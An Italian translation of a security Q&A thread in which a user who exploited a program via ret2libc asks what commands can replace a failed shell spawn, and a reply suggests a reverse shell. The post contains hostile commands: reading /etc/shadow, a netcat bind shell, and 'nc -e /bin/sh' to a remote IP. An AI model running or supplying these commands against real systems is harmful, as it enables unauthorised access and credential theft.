Cosa dovresti fare se non puoi generare una shell in un attacco di overflow del buffer?

2

Ho sfruttato con successo un programma usando ret2libc ma sto incontrando un problema. Ogni volta che nutro system() con /bin/sh non ho nulla in cambio, il programma esce silenziosamente.

Tuttavia, se nutro echo val > /t e leggo /t , ottengo val .

Quindi sono in grado di eseguire comandi parziali e voglio sapere quali comandi possono essere usati invece di generare una shell?

Ho pensato a:

nc -l -p 99 #but I get illegal arg -p
cat /etc/shadow #but I get sh: 1: tc/shadow: not found

Vorrei sapere quali altre possibilità posso eseguire che mi consentiranno di accedere al server / computer vulnerabile tenendo presente che la shell inversa ( nc -l -p -e /bin/sh ) non ha funzionato a causa della limitazione delle stringhe di qualche tipo.

    
posta AK_ 12.05.2014 - 09:08
fonte

1 risposta

1

Un guscio inverso dovrebbe farlo. Hai diverse opzioni. Leggi un po 'di più qui.

link

Con netcat credo che si possa fare nel modo seguente

nc -e /bin/sh 10.0.0.1 1234
    
risposta data 12.05.2014 - 12:34
fonte

Leggi altre domande sui tag